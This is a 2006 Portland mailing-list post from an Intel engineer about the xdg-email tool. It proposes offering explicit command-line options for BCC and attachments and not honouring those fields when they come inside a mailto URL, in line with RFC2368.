[Portland] RE: xdg-email BCC

Bastian, Waldo waldo.bastian at intel.com
Fri Jun 2 15:23:23 PDT 2006

[CC'ing Portland list]

Well RFC2368 was written with the web in mind. Our use case here is slightly different, we want to give applications the possibility to invoke a mailer. The points made in the RFC remain valid though, so maybe we should offer explicit options for BCC and Attachment but not honour these options when they are part of the URL. Maybe we should go even further and offer all other options as an explicit command line options as well, which might be convenient in case you have the individual elements at hand but not a URL. What do other people think?

Waldo Bastian
Linux Client Architect - Client Linux Foundation Technology
Channel Platform Solutions Group
Intel Corporation - http://www.intel.com/go/linux
OSDL DTL Tech Board Chairman